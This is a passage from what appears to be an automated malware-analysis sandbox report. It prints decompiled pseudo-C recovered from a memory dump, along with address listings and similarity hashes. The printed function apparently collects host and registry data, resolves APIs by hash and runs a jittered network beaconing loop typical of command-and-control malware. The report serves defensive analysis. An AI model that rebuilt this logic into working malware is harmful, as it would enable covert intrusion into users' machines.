								_push(1);
								_push(_t111);
								_v36 = _t75;
								E003B10B0();
								_t75 = _v36;
								_t174 = _t174 + 8;
							}
							 *(_t90 + 4) = _v32;
							 *_t90 = _t75;
						} else {
							_t75 = 0;
						}
						if(_t75 != 0) {
							_t112 = 0;
							while(1) {
								_t133 =  *_t161;
								_t112 = _t112 + 1;
								 *_t75 = _t133;
								if(_t146 != 0 && _t112 == _t146) {
									break;
								}
								if(_t133 != 0) {
									_t75 = _t75 + 1;
									_t161 = _t161 + 1;
									continue;
								}
								goto L93;
							}
							 *((char*)(_t75 + 1)) = 0;
						}
					}
				} else {
					_push(0x40);
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t162 = E003B1030();
					_t174 = _t174 + 4;
					_t139 =  *_t90;
					if(_t139 == 0) {
						 *_t162 = 0;
					} else {
						if(_t162 != 0) {
							_t116 =  *_t139;
							 *_t162 = _t116;
							if(_t116 != 0) {
								_t154 = 0;
								while(1) {
									_t154 = _t154 + 1;
									_t117 =  *((char*)(_t139 + _t154 * 2 - 1));
									 *((char*)(_t162 + _t154 * 2 - 1)) = _t117;
									if(_t117 == 0) {
										goto L32;
									}
									_t118 =  *((char*)(_t139 + _t154 * 2));
									 *((char*)(_t162 + _t154 * 2)) = _t118;
									if(_t118 != 0) {
										continue;
									}
									goto L32;
								}
							}
						}
						L32:
						_push(1);
						_push(_t139);
						E003B10B0();
						_t174 = _t174 + 8;
					}
					L92:
					 *(_t90 + 4) = 0x40;
					 *_t90 = _t162;
				}
				goto L93;
			}

0x003c4ca9
0x003c4cac
0x003c4cb1
0x003c4cb7
0x003c4cbb
0x003c4cbf
0x003c4cc3
0x003c508e
0x003c5090
0x003c4cc9
0x003c4ccb
0x003c4cce
0x003c4ce6
0x003c4cea
0x003c4cf6
0x003c4cfc
0x003c4cfc
0x003c4d01
0x003c4d05
0x003c4d0b
0x00000000
0x00000000
0x003c4d11
0x003c4d16
0x00000000
0x003c4d18
0x003c4d1e
0x003c4d33
0x003c4d33
0x00000000
0x003c4d20
0x003c4d20
0x003c4d2a
0x003c4d31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c4d31
0x00000000
0x003c4d20
0x003c4d1e
0x00000000
0x003c4d16
0x003c5087
0x003c508a
0x00000000
0x003c4cd0
0x003c4cd2
0x003c4cd4
0x003c4cd7
0x003c4ce1
0x003c4ce4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c4ce4
0x003c5078
0x003c507a
0x003c4d38
0x003c4d38
0x003c4d3a
0x003c4d3f
0x003c4d41
0x003c4d44
0x003c4d48
0x003c4d4b
0x003c4d4d
0x003c4d57
0x003c4d5d
0x00000000
0x00000000
0x00000000
0x003c4d5d
0x003c5068
0x003c5069
0x003c506d
0x00000000
0x003c5073
0x00000000
0x003c5073
0x00000000
0x003c506d
0x003c4d5f
0x003c4d5f
0x003c5080
0x003c5080
0x003c5080
0x00000000
0x003c5024
0x003c502f
0x00000000
0x003c502f
0x003c4cce
0x003c4d62
0x003c4d64
0x003c4d65
0x003c4d69
0x003c4d6b
0x003c4d70
0x003c4d73
0x003c4d77
0x003c4d7a
0x003c4d7c
0x003c4d86
0x003c4d8c
0x00000000
0x00000000
0x00000000
0x003c4d8c
0x003c5058
0x003c5059
0x003c505d
0x00000000
0x003c5063
0x00000000
0x003c5063
0x00000000
0x003c505d
0x003c4d8e
0x003c4d8e
0x003c4d8e
0x003c4d91
0x003c4d96
0x003c4df3
0x003c5051
0x003c4df9
0x003c4dfb
0x003c4dfe
0x003c4e12
0x003c4e16
0x003c4e22
0x003c4e28
0x003c4e28
0x003c4e2d
0x003c4e31
0x003c4e37
0x00000000
0x00000000
0x003c4e3d
0x003c4e42
0x00000000
0x003c4e44
0x003c4e44
0x003c4e4d
0x003c4e5e
0x003c4e5e
0x00000000
0x003c4e4f
0x003c4e55
0x003c4e5c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c4e5c
0x003c4e4f
0x003c4e4d
0x00000000
0x003c4e42
0x003c5042
0x003c5044
0x003c5047
0x003c504a
0x003c4e00
0x003c4e02
0x003c4e04
0x003c4e07
0x003c4e0d
0x003c4e10
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c4e10
0x003c4e07
0x003c4dfe
0x003c4e63
0x003c4e67
0x003c4e6c
0x003c4e6f
0x003c4e73
0x003c4e79
0x003c4e79
0x003c4e7d
0x003c4e7f
0x003c4e84
0x003c4e86
0x003c4fd1
0x003c4fd8
0x003c4fda
0x003c4fdd
0x003c4fe1
0x003c5018
0x003c4fe3
0x003c4fe5
0x003c4fe7
0x003c4fea
0x003c4fee
0x003c4ff0
0x003c4ff2
0x003c4ff2
0x003c4ff3
0x003c4ff8
0x003c4ffe
0x00000000
0x00000000
0x003c5000
0x003c5004
0x003c5009
0x00000000
0x00000000
0x00000000
0x003c5009
0x003c4ff2
0x003c4fee
0x003c500b
0x003c500b
0x003c500d
0x003c500e
0x003c5013
0x003c5013
0x00000000
0x003c4e96
0x003c4e98
0x003c4e9a
0x003c4e9e
0x003c4ea1
0x003c4eb5
0x003c4eb9
0x003c4ec5
0x003c4ecb
0x003c4ecb
0x003c4ed0
0x003c4ed4
0x003c4eda
0x00000000
0x00000000
0x003c4ee0
0x003c4ee5
0x00000000
0x003c4ee7
0x003c4eed
0x003c4efe
0x003c4efe
0x00000000
0x003c4eef
0x003c4ef5
0x003c4efc
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c4efc
0x003c4eef
0x003c4eed
0x00000000
0x003c4ee5
0x003c5038
0x003c503b
0x003c4ea3
0x003c4ea5
0x003c4ea7
0x003c4eaa
0x003c4eb0
0x003c4eb3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x003c4eb3
0x003c4eaa
0x003c4ea1
0x003c4f03
0x003c4f08
0x003c4f0e
0x003c4f13
0x003c4f29
0x003c4f2d
0x003c4f33
0x003c4f3b
0x003c4f3b
0x003c4f49
0x003c4f4c
0x003c4f50
0x003c4f51
0x003c4f56
0x003c4f59
0x003c4f5d
0x003c4fa7
0x003c4f5f
0x003c4f61
0x003c4f63
0x003c4f66
0x003c4f6a
0x003c4f6e
0x003c4f71
0x003c4f73
0x003c4f73
0x003c4f74
0x003c4f79
0x003c4f7f
0x00000000
0x00000000
0x003c4f81
0x003c4f85
0x003c4f8a
0x00000000
0x00000000
0x00000000
0x003c4f8a
0x003c4f8c
0x003c4f8f
0x003c4f8f
0x003c4f6a
0x003c4f92
0x003c4f94
0x003c4f95
0x003c4f99
0x003c4f9e
0x003c4fa2
0x003c4fa2
0x003c4fae
0x003c4fb1
0x003c4f15
0x003c4f15
0x003c4f15
0x003c4fb5
0x003c4fb7
0x003c4fbd
0x003c4fbd
0x003c4fc0
0x003c4fc1
0x003c4fc5
0x00000000
0x00000000
0x003c4fcd
0x003c4fbb
0x003c4fbc
0x00000000
0x003c4fbc
0x00000000
0x003c4fcd
0x003c5032
0x003c5032
0x003c4fb5
0x003c4d98
0x003c4d9a
0x003c4d9c
0x003c4d9e
0x003c4da6
0x003c4da8
0x003c4dab
0x003c4daf
0x003c4de9
0x003c4db1
0x003c4db3
0x003c4db5
0x003c4db8
0x003c4dbc
0x003c4dbe
0x003c4dc0
0x003c4dc0
0x003c4dc1
0x003c4dc6
0x003c4dcc
0x00000000
0x00000000
0x003c4dce
0x003c4dd2
0x003c4dd7
0x00000000
0x00000000
0x00000000
0x003c4dd7
0x003c4dc0
0x003c4dbc
0x003c4dd9
0x003c4dd9
0x003c4ddb
0x003c4ddc
0x003c4de1
0x003c4de1
0x003c501b
0x003c501b
0x003c5022
0x003c5022
0x00000000

Strings

, xrefs: 003C4CAC

Memory Dump Source

Source File: 00000004.00000002.2392646074.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: true

Similarity

API ID:
String ID:
API String ID: 0-3688684798
Opcode ID: 55116d205a5955169b8b1c5b6f4f00d31fe21da2b8bdd164e3535646119249eb
Instruction ID: af4407f8e68a44a21756069192356cfa2e0c11ea84daa545020373bea1846b3d
Opcode Fuzzy Hash: 55116d205a5955169b8b1c5b6f4f00d31fe21da2b8bdd164e3535646119249eb
Instruction Fuzzy Hash: D2B14E759097A246D727593888F0B3A7AD26FD2310F2EC76CD8D6CF697DA718C818381

Uniqueness

Uniqueness Score: -1.00%

Function 003A6AD0, Relevance: .9, Instructions: 932
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E003A6AD0(void* __ebx, char __ecx, char __edx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				char _v120;
				char _v176;
				char _v192;
				char _v216;
				char _v240;
				char _v244;
				char _v248;
				intOrPtr _v252;
				char _v260;
				intOrPtr _v264;
				char _v268;
				char _v276;
				char _v280;
				intOrPtr _v284;
				char _v304;
				char _v312;
				char _v320;
				char _v328;
				char _v340;
				char _v344;
				char _v348;
				signed int _v352;
				signed int _v360;
				short _v364;
				char _v368;
				char _v376;
				void* _v380;
				char _v404;
				char _v408;
				signed int _v420;
				char _v440;
				intOrPtr _v448;
				char _v452;
				char _v456;
				char _v464;
				char _v468;
				signed int _v472;
				char _v476;
				char _v480;
				char _v484;
				char _v488;
				char _v508;
				char _v512;
				char _v516;
				char _v524;
				char _v528;
				char _v532;
				void* _v540;
				char _v552;
				char _v556;
				signed int _v560;
				char _v564;
				char _v568;
				char _v572;
				void* _v576;
				char _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				void* _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				signed int _v608;
				void* _v612;
				char _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				signed int* _v628;
				signed int _v632;
				signed int _v636;
				char _v640;
				signed int _v644;
				char _v648;
				char _v652;
				signed int _v656;
				signed int _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				void* _v680;
				char _v684;
				intOrPtr* _v688;
				char _v692;
				void* _v696;
				void* _v700;
				void* _v704;
				char _v708;
				void* _v712;
				char _v720;
				void* _v728;
				void* _v732;
				void* _v736;
				void* _v740;
				void* _v744;
				void* _v748;
				void* _v752;
				void* _v760;
				void* _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v800;
				void* _v804;
				void* _v808;
				void* _v812;
				void* _v816;
				void* _v824;
				void* _v836;
				void* _v840;
				void* _v844;
				void* _v848;
				void* _v852;
				void* _v948;
				void* _v956;
				signed int _t329;
				signed int _t330;
				intOrPtr _t375;
				intOrPtr* _t382;
				intOrPtr _t389;
				void* _t400;
				signed int _t416;
				signed int _t417;
				void* _t444;
				void* _t445;
				void* _t446;
				void* _t449;
				void* _t454;
				signed int _t467;
				signed int _t476;
				signed int _t478;
				void* _t497;
				signed int _t506;
				signed int _t507;
				signed int _t519;
				void* _t521;
				signed int _t529;
				signed int _t535;
				signed int _t547;
				signed int _t549;
				signed int _t551;
				signed int _t561;
				signed int _t565;
				signed int _t567;
				signed int _t579;
				signed int _t591;
				signed int _t592;
				signed short* _t594;
				signed int _t600;
				void* _t602;
				intOrPtr* _t603;
				void* _t610;
				signed int _t755;
				signed int _t804;
				signed int* _t808;
				void* _t810;
				signed int _t849;
				signed int _t850;
				signed int _t853;
				signed int* _t855;
				signed int _t860;
				signed int _t861;
				signed int* _t862;
				signed int _t864;
				signed int _t867;
				intOrPtr _t868;
				void* _t871;
				signed int _t872;
				signed int _t874;
				signed int _t876;
				signed int _t878;

				_t874 = _t876;
				_push(__esi);
				_push(__edi);
				_push(__ebx);
				_t878 = (_t876 & 0xfffffff0) - 0x274;
				_v192 = __ecx;
				_v640 = __edx;
				_t867 =  *0x3db000; // 0xffffffff
				_v644 = (E003B3930(__ebx, 0, __edi, _t867))[2] & 0x000000ff;
				_t855 = E003B3930(__ebx, 0, __edi, _t867);
				_t329 =  *0x3db260; // 0x2661fb0
				_v636 = _t329;
				if(_t329 == 0) {
					_push(0x10);
					_t330 = E003B1030();
					_v636 = _t330;
					_t878 = _t878 + 4;
					__eflags = _v636;
					if(_v636 == 0) {
						_v636 = 0;
					} else {
						_t853 = _t330;
						 *((intOrPtr*)(_t853 + 4)) = 0;
						 *((intOrPtr*)(_t853 + 8)) = 0;
						 *((intOrPtr*)(_t853 + 0xc)) = 0;
					}
					_t808 = _v636;
					 *0x3db260 = _t808;
					 *_t808 =  *0x3db024 & 0x0000ffff;
					__eflags = ( *0x3db02b & 0x000000ff) - 0xa;
					if(( *0x3db02b & 0x000000ff) <= 0xa) {
					}
					__eflags =  *0x3db02b & 0x000000ff;
					if(( *0x3db02b & 0x000000ff) > 0) {
						__eflags = 0;
						_v584 = _t867;
						_t872 = 0;
						do {
							_v360 = 0;
							_t850 = _t872 + _t872 * 2;
							_v368 =  *((intOrPtr*)(0x3db02c + _t850 * 2));
							_v364 =  *(0x3db030 + _t850 * 2) & 0x0000ffff;
							E003D3100( &_v344,  &_v368, _t874,  &_v344);
							_t804 =  *0x3db260; // 0x2661fb0
							_t322 = _t804 + 4; // 0x4
							E003C37E0(_t804 + 4, _v348,  *_t322);
							E003C0B10( &_v344);
							_t872 = _t872 + 1;
							__eflags = _t872 - ( *0x3db02b & 0x000000ff);
						} while (_t872 < ( *0x3db02b & 0x000000ff));
						_t579 =  *0x3db260; // 0x2661fb0
						_t867 = _v584;
						_v636 = _t579;
					}
				}
				_t810 =  !=  ? 0x10 : _t855[3] & 0x000000ff;
				_t610 =  !=  ? 0 : 0x20;
				_t585 =  !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20;
				_t813 =  <=  ? 0 : 0x80;
				_t586 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80);
				_t587 = ( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff;
				_t588 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 8;
				_t589 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010;
				_t590 = (( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855;
				E003C06A0( &_v240, _t874, 0);
				_push(0);
				E003C9350( &_v304);
				E003CB360( &_v240);
				E003C0B30( &_v248, 0, _v240);
				E003C0B10( &_v244);
				_v120 = E003C6040(_v252, 0x7fffffff);
				E003C9710( &_v312,  &_v120, 1);
				_v652 = _v260;
				E003C9710( &_v320, _v652, E003C6040(_v260, 0x7fffffff));
				E003CBA80((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867, _t874);
				_push(0);
				_push( &_v260);
				E003C9EB0((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855,  &_v312, _t855, _t867);
				E003C1240( &_v268,  &_v260);
				E003C0B30( &_v280, 0x7fffffff, _v264);
				E003C0B10( &_v268);
				E003C0B10( &_v276);
				E003C9510( &_v328);
				_v676 = _v284;
				E003C9710( &_v344, _v676, E003C6040(_v284, 0x7fffffff));
				_v216 = E003B0B50( *_v688);
				E003C9710( &_v352,  &_v216, 2);
				_v248 = E003B0B60((( !=  ? _t810 + _t610 + 0x40 : _t810 + 0x20) + ( <=  ? 0 : 0x80) | _t855[2] & 0x000000ff) << 0x00000008 | _t855[1] << 0x00000010 |  *_t855);
				E003C9710( &_v360,  &_v248, 4);
				_v248 = _v708;
				E003C9710( &_v368,  &_v248, 4);
				_t822 =  &_v176;
				_v176 = _v720;
				E003C9710( &_v376,  &_v176, 1);
				_t886 =  *0x3db264;
				if( *0x3db264 == 0) {
					 *0x3db264 = 1;
					E003C06A0(_t878 + 0xe0, _t874, 0);
					E003C0D40(E003C0D40(E003C0D40( &_v440, 0x2e), 0x4b), 0x42);
					E003B8810( &_v532, 0);
					E003B96D0(E003B96D0(E003B96D0(E003B96D0(_t878 + 0x90, 0x20), 0x28), 0x4b), 0x42);
					asm("movups xmm0, [0x3d9400]");
					_t375 =  *0x3d9410; // 0x13401ec1
					asm("movups [esp], xmm0");
					_v676 = _t375;
					_push(0);
					E003C9350( &_v568);
					_v628 = _t855;
					_t591 = 0;
					__eflags = 0;
					_v636 = _t867;
					do {
						E003C9670( &_v572, E003C9650( &_v572) + 4);
						_t868 =  *((intOrPtr*)(_t878 + _t591 * 4));
						_t382 = E003C9640( &_v572, E003C9650( &_v572) + 0xfffffffc);
						_t591 = _t591 + 1;
						 *_t382 = _t868;
						__eflags = _t591 - 5;
					} while (_t591 < 5);
					_t592 = 0;
					__eflags = 0;
					_t857 = _v592;
					_t869 = _v600;
					_v568 = 0;
					_v564 = 0;
					_v560 = 0;
					do {
						_push(0);
						E003CC550(_t592,  &_v556, _t869, _t874, _t878 + 0x84, 0x80000002);
						E003CCE00(_t592,  &_v568, _t857, _t869, _t874,  &_v340);
						E003B8810( &_v472, 0);
						E003B8810( &_v468, 0);
						__eflags = _v352;
						if(_v352 > 0) {
							_v604 = _t592;
							_t871 = 0;
							__eflags = 0;
							do {
								_t603 = E003C7600(_t878 + 0x150, _t871);
								_t535 = E003C1000(_t603);
								__eflags = _t535;
								if(_t535 == 0) {
									__eflags = E003C1460(_t603, _v448);
									if(__eflags == 0) {
										_push(_v560);
										_push(0);
										E003CBF30( &_v652, __eflags,  *_t603);
										_t857 =  &_v644;
										E003CC580( &_v664, _t822,  &_v644, 0xffa790dd);
										E003CCAE0( &_v672,  &_v644, _v652);
										E003C0B10( &_v644);
										E003BF6E0( &_v652,  &_v644);
										E003B8CC0(_t878 + 0xd0, _v648);
										E003B8CA0( &_v652);
										E003B8CA0( &_v660);
										_t547 = E003B9DC0(_t878 + 0xcc);
										__eflags = _t547;
										if(_t547 != 0) {
											L70:
											E003B8CA0( &_v648);
											__eflags = _v652;
											if(_v652 != 0) {
												_t822 = _v656;
												__eflags = _t822;
												if(_t822 == 0) {
													L74:
													_t549 = 1;
												} else {
													__eflags = _t822 - 0xffffffff;
													if(_t822 == 0xffffffff) {
														goto L74;
													} else {
														_t549 = 0;
													}
												}
												__eflags = _t549;
												if(_t549 == 0) {
													E003CBF00(_t822);
												}
											}
											_v656 = 0;
											goto L38;
										} else {
											_t551 = E003BA330( &_v472, _t871,  *((intOrPtr*)(_t878 + 0x8c)));
											__eflags = _t551;
											if(_t551 == 0) {
												_t857 = _t878;
												E003CC580( &_v660, _t822, _t878, 0x494c03d0);
												E003CCAE0( &_v668,  &_v640, _v684);
												E003C0B10(_t878);
												E003BF6E0( &_v648,  &_v640);
												E003B8CC0( &_v484, _v644);
												E003B8CA0( &_v648);
												E003B8CA0( &_v656);
												_t561 = E003B9DC0( &_v488);
												__eflags = _t561;
												if(_t561 == 0) {
													E003B96D0(E003C0220(E003B96D0(E003B96D0( &_v472, 0x20), 0x28), _v472, 0), 0x29);
												}
												_t822 = _v472;
												E003B7FA0( &_v668);
												E003C0B30(_t603, _v472, _v668);
												E003C0B10( &_v672);
												_push( *_t603);
												_t565 = E003C8820(_t603,  &_v588, _t857, _t871);
												__eflags = _t565;
												if(_t565 == 0) {
													E003C37E0( &_v588,  *_t603, _v588);
												}
												E003B8CA0( &_v652);
												__eflags = _v656;
												if(_v656 != 0) {
													_t822 = _v660;
													__eflags = _t822;
													if(_t822 == 0) {
														L86:
														_t567 = 1;
													} else {
														__eflags = _t822 - 0xffffffff;
														if(_t822 == 0xffffffff) {
															goto L86;
														} else {
															_t567 = 0;
														}
													}
													__eflags = _t567;
													if(_t567 == 0) {
														E003CBF00(_t822);
													}
												}
												_v660 = 0;
												goto L38;
											} else {
												goto L70;
											}
										}
										goto L99;
									}
								}
								L38:
								_t871 = _t871 + 1;
								__eflags = _t871 -  *((intOrPtr*)(_t878 + 0x14c));
							} while (_t871 <  *((intOrPtr*)(_t878 + 0x14c)));
							_t592 = _v604;
						}
						_t389 = _v600;
						__eflags =  *((char*)(_t389 + 0xb)) - 0x28;
						if( *((char*)(_t389 + 0xb)) < 0x28) {
							_t867 = _v608;
							E003B8CA0( &_v456);
							E003B8CA0( &_v464);
							E003C7560(_t878 + 0x14c, _t857, _t867);
							E003B8CA0( &_v552);
							__eflags = _v556;
							if(_v556 != 0) {
								_t849 = _v560;
								__eflags = _t849;
								if(_t849 == 0) {
									L64:
									_t519 = 1;
								} else {
									__eflags = _t849 - 0xffffffff;
									if(_t849 == 0xffffffff) {
										goto L64;
									} else {
										_t519 = 0;
									}
								}
								__eflags = _t519;
								if(_t519 == 0) {
									E003CBF00(_t849);
								}
							}
							_v560 = 0;
						} else {
							_t521 = E003C9650(_t878 + 0x7c);
							_t190 = _t521 + 4; // 0x4
							E003C9670(_t878 + 0x80, _t190);
							_t857 = _t521 + 0xfffffffc;
							__eflags = _t857;
							if(_t857 > 0) {
								_t869 = E003C9640(_t878 + 0x80, 8);
								E003B0BC0(_t531, E003C9640(_t878 + 0x80, 4), _t857);
								_t878 = _t878 + 0xc;
							}
							 *((intOrPtr*)(E003C9640(_t878 + 0x80, 4))) = 0xd2b02901;
							E003B8CA0(_t878 + 0xd4);
							E003B8CA0( &_v468);
							E003C7560( &_v340, _t857, _t869);
							E003B8CA0( &_v556);
							__eflags = _v560;
							if(_v560 != 0) {
								_t822 = _v560;
								__eflags = _t822;
								if(_t822 == 0) {
									L47:
									_t529 = 1;
								} else {
									__eflags = _t822 - 0xffffffff;
									if(_t822 == 0xffffffff) {
										goto L47;
									} else {
										_t529 = 0;
									}
								}
								__eflags = _t529;
								if(_t529 == 0) {
									E003CBF00(_t822);
								}
							}
							goto L50;
						}
						L52:
						E003AABE0(_t878 + 0x94, 0);
						E003B83B0( &_v512);
						E003C6EC0(_t878 + 0x9c, _v512, 0);
						E003C0B10(_t878 + 0x9c);
						_t400 = E003C37E0(E003C88F0( &_v584), _v528,  *_t399);
						_t858 = _t878 + 0xa4;
						E003C7FC0(_t400, _t878 + 0xa4, 0x3b);
						_v452 = E003B0B60(E003C6040(_v528, 0x7fffffff));
						E003C9710( &_v348,  &_v452, 4);
						E003C9710(_t878 + 0x160,  *((intOrPtr*)(_t878 + 0xa4)), E003C6040( *((intOrPtr*)(_t878 + 0xa4)), 0x7fffffff));
						E003C0B10(_t878 + 0xa4);
						E003C0B10( &_v560);
						E003C7560( &_v616, _t878 + 0xa4, _t867);
						E003C06A0(_t878 + 0xb0, _t874, 0);
						E003C06A0( &_v532, _t874, 0);
						E003C06A0( &_v528, _t874, 0);
						_push(0);
						E003C9350( &_v644);
						 *((intOrPtr*)(_t878 + 0xe4)) = 0;
						 *((intOrPtr*)(_t878 + 0xe8)) = 0;
						_v488 = 0;
						_t416 = E003B15C0(0xa1310f65, 0xf95c938e);
						__eflags = _t416;
						if(_t416 == 0) {
							_t594 = 0;
							__eflags = 0;
							_t417 =  *0x00000000 & 0x0000ffff;
							__eflags = _t417;
							while(_t417 != 0) {
								__eflags = _t417 - 0x3d;
								if(_t417 != 0x3d) {
									E003B83B0( &_v404);
									E003C37E0(_t878 + 0xec, _v404,  *((intOrPtr*)(_t878 + 0xe4)));
									E003C0B10(_t878 + 0x10c);
								}
								_t594 = _t594 + 2 + E003C0180(_t594, 0x7fffffff, _t867) * 2;
								_t417 =  *_t594 & 0x0000ffff;
								__eflags = _t417;
							}
							E003C7FC0(E003C88F0(E003C3EC0(_t878 + 0xe4)),  &_v476, 0xa);
							E003C6EC0( &_v508, _v484, 0);
							E003C0B10( &_v476);
							E003C7560(_t878 + 0xe4, _t858, _t867);
							_v440 = E003B0B60(E003C6040(_v516, 0x7fffffff));
							E003C9710( &_v344,  &_v440, 4);
							E003C9710( &_v352, _v524, E003C6040(_v524, 0x7fffffff));
							E003C9510( &_v628);
							E003C0B10( &_v516);
							E003C0B10( &_v524);
							E003C0B10( &_v532);
							E003C9510( &_v580);
							E003B8CA0( &_v564);
							E003C0B10( &_v484);
							goto L2;
						} else {
							asm("int3");
							return _t416;
						}
						goto L99;
						L50:
						_t592 = _t592 + 1;
						_v560 = 0;
						__eflags = _t592 - 2;
					} while (_t592 < 2);
					_t867 = _v608;
					goto L52;
				} else {
					L2:
					E003AABE0( &_v260, 2);
					E003C1EB0( &_v260, _t886,  &_v244, 0x3b);
					E003C0B10( &_v268);
					_push(E003C9650(_t878 + 0x158));
					E003C9350( &_v304);
					_v620 =  *((intOrPtr*)(_t878 + 0x1ac));
					_v624 = E003C6040( *((intOrPtr*)(_t878 + 0x1ac)), 0x7fffffff);
					_t444 = E003C9640( &_v340, 0);
					_t445 = E003C9650( &_v344);
					_t446 = E003C9640( &_v312, 0);
					_push(0);
					_push(0);
					_push(_t446);
					_push(_t445);
					_push(_t444);
					_t832 = _v632;
					E003CE5D0(_v628, _v632, _t867);
					_t449 = E003CA190(_t878 + 0x178);
					_push(0);
					E003C9350(_t878 + 0x1e4);
					_v244 = E003B0B60(_t449);
					E003C9710(_t878 + 0x1ec,  &_v244, 4);
					_t454 = E003C9640( &_v348, 0);
					E003C9710( &_v244, _t454, E003C9650( &_v352));
					E003C9510( &_v360);
					E003C0B10(_t878 + 0x1ac);
					E003C9510(_t878 + 0x158);
					E003C0B10(_t878 + 0x194);
					_push(0);
					E003C9350(_t878 + 0x1f8);
					_push(0);
					E003C9350( *((intOrPtr*)(_t878 + 0x1c8)));
					_t860 =  *0x3db260; // 0x2661fb0
					if(_t860 == 0) {
						_push(0x10);
						_t861 = E003B1030();
						_t878 = _t878 + 4;
						__eflags = _t861;
						if(_t861 == 0) {
							_t861 = 0;
							__eflags = 0;
						} else {
							 *(_t861 + 4) = 0;
							 *((intOrPtr*)(_t861 + 8)) = 0;
							 *((intOrPtr*)(_t861 + 0xc)) = 0;
						}
						 *_t861 =  *0x3db024 & 0x0000ffff;
						_t832 =  *0x3db02b & 0x000000ff;
						 *0x3db260 = _t861;
						__eflags = ( *0x3db02b & 0x000000ff) - 0xa;
						if(( *0x3db02b & 0x000000ff) <= 0xa) {
						}
						__eflags =  *0x3db02b & 0x000000ff;
						if(( *0x3db02b & 0x000000ff) > 0) {
							_t864 = 0;
							__eflags = 0;
							_t602 = _t878 + 0x134;
							do {
								 *(_t878 + 0x128) = 0;
								_t507 = _t864 + _t864 * 2;
								_t832 =  *(0x3db02c + _t507 * 2);
								_v420 =  *(0x3db02c + _t507 * 2);
								 *((short*)(_t878 + 0x124)) =  *(0x3db030 + _t507 * 2) & 0x0000ffff;
								E003D3100(_t602,  &_v420, _t874, _t602);
								_t755 =  *0x3db260; // 0x2661fb0
								_t157 = _t755 + 4; // 0x4
								E003C37E0(_t755 + 4, _v404,  *_t157);
								E003C0B10(_t602);
								_t864 = _t864 + 1;
								__eflags = _t864 - ( *0x3db02b & 0x000000ff);
							} while (_t864 < ( *0x3db02b & 0x000000ff));
							_t861 =  *0x3db260; // 0x2661fb0
						}
					}
					_t862 = _t861 + 4;
					E003B22A0(0x3e8, _t832);
					_t600 = 0;
					_t888 = _t867 - 0xffffffff;
					if(_t867 == 0xffffffff) {
						L11:
						_t467 = _t600;
						asm("cdq");
						_t833 = _t467 %  *_t862;
						_t867 = _t467 %  *_t862;
					}
					E003D31A0(_t600, _t878 + 0x224, _t862);
					 *(_t878 + 0x23c) = 1;
					 *((intOrPtr*)(_t878 + 0x264)) = 0x12c;
					if(E003D3370(_t600, _t878 + 0x228, _t862, _t867, _t888, E003C7600(_t862, _t867)) == 0) {
						L5:
						E003D3260(_t878 + 0x224, _t833, _t867);
						_t600 = _t600 + 1;
						_t888 = _t600;
						if(_t600 != 0) {
							_t476 = _t600;
							asm("cdq");
							__eflags = _t476 %  *_t862;
							if(_t476 %  *_t862 != 0) {
								_t837 = 0xb4;
								_t478 = E003CE170(0x78, 0xb4);
							} else {
								_t837 = 0x168;
								_t478 = E003CE170(0xf0, 0x168);
							}
							__eflags = _t478 * 0x3e8;
							E003B22A0(_t478 * 0x3e8, _t837);
						} else {
							E003B22A0(0x3e8, _t833);
						}
						goto L11;
					}
					E003D3820(_t878 + 0x22c,  &_v192, _t878 + 0x1e4);
					_t833 = _t878 + 0x204;
					_push(_t878 + 0x204);
					E003C9520( &_v216);
					E003C9510(_t878 + 0x204);
					__eflags =  *(_t878 + 0x224);
					if( *(_t878 + 0x224) != 0) {
						goto L5;
					}
					_t833 =  *(_t878 + 0x258);
					__eflags = _t833 - 0xc8;
					if(_t833 != 0xc8) {
						__eflags = _t833 - 0x194;
						if(_t833 != 0x194) {
							goto L5;
						}
					}
					_t838 = _a4 & 0x000000ff;
					__eflags = _a4 & 0x000000ff;
					if((_a4 & 0x000000ff) != 0) {
						_push(0);
						E003C9350( &_v276);
						 *((intOrPtr*)(_t878 + 0x1cc)) = E003B0B60(E003C9A90( &_v216, _t867));
						__eflags = E003CA190( &_v216) -  *((intOrPtr*)(_t878 + 0x1cc));
						if(__eflags == 0) {
							E003AABE0(_t878 + 0x13c, 2);
							E003C1EB0(_t878 + 0x144, __eflags, _t878 + 0x144, 0x3b);
							E003C0B10( &_v408);
							_push(E003C9650(_t878 + 0x1f4));
							E003C9350( &_v472);
							 *((intOrPtr*)(_t878 + 0x188)) = _v404;
							_v484 = E003C6040(_v404, 0x7fffffff);
							 *((intOrPtr*)(_t878 + 0x190)) = E003C9640(_t878 + 0x1f8, 0);
